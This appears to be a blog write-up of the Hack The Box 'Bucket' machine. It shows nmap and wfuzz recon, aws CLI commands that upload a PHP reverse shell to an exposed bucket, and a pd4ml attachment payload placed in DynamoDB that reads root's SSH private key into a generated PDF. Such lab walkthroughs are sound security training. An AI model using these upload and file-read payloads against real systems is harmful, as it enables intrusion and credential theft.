Hackthebox Bucket WriteUp

Overview:

Bucket is a fun linux machine exploiting aws bucker server. After fuzz subdomain there is a bucket server running. Use aws CLI commands to find a endpoint and use put-item to upload a reverse shell. PriEsc is also to exploit aws bucket. but its abit hard to do. After forawrd a port, We could create a table and take advantage of put item about root’s id_rsa key then save it to a default directory. This box it’s awesome to learn some aws CLI stuff. With all that being said, Let’s just jump in!

Reconnaissance:

┌──(kali㉿kali)-[~/htb/boxes/bucket]
└─$ nmap -sC -sV -oN sc 10.10.10.212 -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 18:57 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating NSE at 18:57
Completed NSE at 18:57, 0.00s elapsed
Initiating Connect Scan at 18:57
Scanning bucket.htb (10.10.10.212) [1000 ports]
Discovered open port 80/tcp on 10.10.10.212
Discovered open port 22/tcp on 10.10.10.212
Completed Connect Scan at 18:58, 10.82s elapsed (1000 total ports)
Initiating Service scan at 18:58
Scanning 2 services on bucket.htb (10.10.10.212)
Completed Service scan at 18:58, 6.45s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.212.
Initiating NSE at 18:58
Completed NSE at 18:58, 5.28s elapsed
Initiating NSE at 18:58
Completed NSE at 18:58, 0.83s elapsed
Initiating NSE at 18:58
Completed NSE at 18:58, 0.00s elapsed
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Foothold:

Head over to http://bucket.htb/ and below web page.

Poking around not find anything, So let’s fuzz sub-domains.

┌──(kali㉿kali)-[~/htb/boxes/bucket]
└─$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://10.10.10.212' -H "Host:FUZZ.bucket.htb" --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.212/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000247: 404 0 L 2 W 21 Ch "s3"┌──(kali㉿kali)-[~/htb/boxes/atom]
└─$ curl http://s3.bucket.htb/
{"status": "running"}

Cool, So this about aws bucket, below are resources about exploit aws bucket and aws CLI commands line.

Setting up aws on our attacker machine.

pip install awscli 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

Find tables and endpoints etc.

aws dynamodb list-tables --endpoint-url http://s3.bucket.htbaws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htbaws s3api list-buckets --endpoint-url http://s3.bucket.htb
ws s3api put-object --endpoint-url http://s3.bucket.htb/ --bucket adserver --key dir-1/rev.php --body /home/kali/htb/boxes/bucket/rev.php

upload a php reverse shell (https://github.com/pentestmonkey/php-reverse-shell) to the server by put-object command.

check http://s3.bucket.htb/adserver/dir-1/rev.php bucket and we uploaded a reverse shell on the server.

Execute it on the http://bucket.htb/dir-1/rev.php to get a shell.

And we can use password found on the bucket to get to user roy

PriEsc to root:

There a port 8000 running, So, let’s do a local port forward and check what it has .

It’s also a aws bucke.

Exploit AWS pdf generator:

aws dynamodb create-table \
--table-name alerts \
--attribute-definitions \
AttributeName=title,AttributeType=S \
--key-schema \
AttributeName=title,KeyType=HASH \
--provisioned-throughput \
ReadCapacityUnits=10,WriteCapacityUnits=5 \
--endpoint-url=http://s3.bucket.htb

we create a table and put a root id_rsa key in it, (do these on attacker machine). It will create a pdf file on the server.

aws dynamodb put-item \
--table-name alerts \
--item \
'{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' \
--endpoint-url=http://s3.bucket.htb

After created it, Pull the pdf file to a default directory /var/www/bucket-app/files.

curl -X POST -d “action=get_alerts” http://127.0.0.1:8000/ -v

Check the pdf result file and we got a root id_rsa key.

logged in as root!

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)

#087 | Is CleanMyMac’s Malware Removal Fake?

Mobile application security : Part 1

Random Access Authenticated Messaging

Tachyon Protocol Weekly Report #36

{UPDATE} Chess Prime 3D Pro Hack Free Resources Generator

How to stake with MetaMask?

How to Gain Advanced Cyber Resilience and Recovery Across the IT Ops and SecOps Divide

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jim Solomon

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

More from Medium

TryHackMe: Content Discovery Walkthrough

THM Anonymous Writeup

THM Chocolate factory writeup

[OWASP Top 10]: API Security Basics ~Series 2~ Risks and Countermeasures